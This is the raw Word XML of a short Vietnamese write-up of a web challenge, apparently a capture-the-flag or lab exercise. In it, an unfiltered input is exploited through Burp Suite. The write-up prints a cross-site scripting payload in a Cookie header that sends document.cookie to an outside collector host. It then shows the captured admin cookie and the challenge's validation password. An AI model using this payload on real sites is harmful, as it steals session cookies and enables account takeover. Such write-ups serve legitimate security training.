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CBE0" w14:textId="1F7F802D" w:rsidR="00837FBD" w:rsidRDefault="003C1A3A">
      <w:r>
        <w:t>Đầu tiên vào trang thì ta thấy trường input không filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410759F" w14:textId="6074BAC3" w:rsidR="003C1A3A" w:rsidRDefault="003C1A3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792DBC0E" wp14:editId="192D11AA">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="54177806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8067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5C2A" w14:textId="1D52FCE3" w:rsidR="003C1A3A" w:rsidRDefault="003C1A3A">
      <w:r>
        <w:t>Thực hiện tấn công bằng burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F73DC" w14:textId="72534C24" w:rsidR="003C1A3A" w:rsidRDefault="003C1A3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1A3A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Cookie: status=invite"&gt;&lt;script&gt;document.write(%22&lt;img src=https://eon5wu9esj2rcgn.m.pipedream.net/?%22.concat(document.cookie.replace(%22 %22,%22&amp;%22)).concat(%22 /&gt;%22))&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587F64E" w14:textId="51DEF3D7" w:rsidR="003C1A3A" w:rsidRDefault="003C1A3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682BDC6" wp14:editId="6C6A62A0">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="212003672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36725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C83" w14:textId="6030A904" w:rsidR="003C1A3A" w:rsidRDefault="003C1A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Kiểm tra thì ta có </w:t>
      </w:r>
      <w:r w:rsidR="0084072C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>admin cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5EC327" w14:textId="5DA74F25" w:rsidR="003C1A3A" w:rsidRDefault="003C1A3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9421DE" wp14:editId="1EF99CA5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20575620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202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AE58" w14:textId="44BEF478" w:rsidR="0084072C" w:rsidRDefault="0084072C" w:rsidP="0084072C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084072C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SY2USDIH78TF3DFU78546TE7F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09902289" w14:textId="40F77860" w:rsidR="0084072C" w:rsidRDefault="0084072C" w:rsidP="00840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Thực hiện vào trường admin và gửi lại gói tin có cookie admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F6028" w14:textId="689DCA87" w:rsidR="0084072C" w:rsidRDefault="0084072C" w:rsidP="008407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D224488" wp14:editId="33769E25">
            <wp:extent cx="5943600" cy="3345180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="3596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2D80" w14:textId="10A8D2CB" w:rsidR="0084072C" w:rsidRPr="003C1A3A" w:rsidRDefault="0084072C" w:rsidP="0084072C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084072C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>You can validate challenge with this pass : E5HKEGyCXQVsYaehaqeJs0AfV</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0084072C" w:rsidRPr="003C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67"/>
    <w:rsid w:val="003C1A3A"/>
    <w:rsid w:val="00837FBD"/>
    <w:rsid w:val="0084072C"/>
    <w:rsid w:val="00CF5090"/>
    <w:rsid w:val="00D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BA77"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BE5DB66B-FB22-4D9F-86A5-3ADF5D68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2023-04-06T13:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-06T14:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>